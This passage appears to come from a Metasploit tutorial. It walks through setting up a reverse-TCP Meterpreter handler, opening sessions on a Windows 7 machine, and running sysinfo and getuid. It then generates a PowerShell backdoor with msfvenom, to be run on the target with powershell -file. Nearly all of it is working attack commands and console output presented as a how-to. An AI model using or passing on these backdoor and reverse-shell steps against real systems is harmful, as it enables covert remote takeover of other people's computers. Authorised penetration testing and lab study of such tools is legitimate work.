payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 172.16.100.128
LHOST => 172.16.100.128
msf exploit(handler) > set LPORT 2345
LPORT => 2345
msf exploit(handler) > exploit

[*] Started reverse handler on 172.16.100.128:2345 
[*] Starting the payload handler...
[*] Sending stage (885806 bytes) to 172.16.100.1
[*] Meterpreter session 1 opened (172.16.100.128:2345 -> 172.16.100.1:56101) at 2016-03-20 16:08:55 +0800

meterpreter > sysinfo 
Computer : DELL-PC
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x64 (Current Process is WOW64)
System Language : zh_CN
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/win32

Generating a PowerShell backdoor for Windows


msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.100.182 LPORT=6666 -f psh-reflection > test.ps1
msf > use multi/handler
msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 172.16.100.182
lhost => 172.16.100.182
msf exploit(handler) > set lport 6666
lport => 6666
msf exploit(handler) > exploit 
[*] Exploit running as background job.

[*] Started reverse TCP handler on 172.16.100.182:6666

Then on Windows run powershell -file "test.ps1":

msf exploit(handler) > 
[*] Sending stage (194623 bytes) to 172.16.100.1
[*] Meterpreter session 6 opened (172.16.100.182:6666 -> 172.16.100.1:62470) at 2017-09-23 17:33:08 +0800
[+] negotiating tlv encryption
[+] negotiated tlv encryption
[+] negotiated tlv encryption

msf exploit(handler) > sessions -i 6
[*] Starting interaction with 6...

meterpreter > getuid
Server username: dell-PC\dell

References
http://www.freebuf.com/sectool/72135.html
http://www.huo119.com/post/909.shtm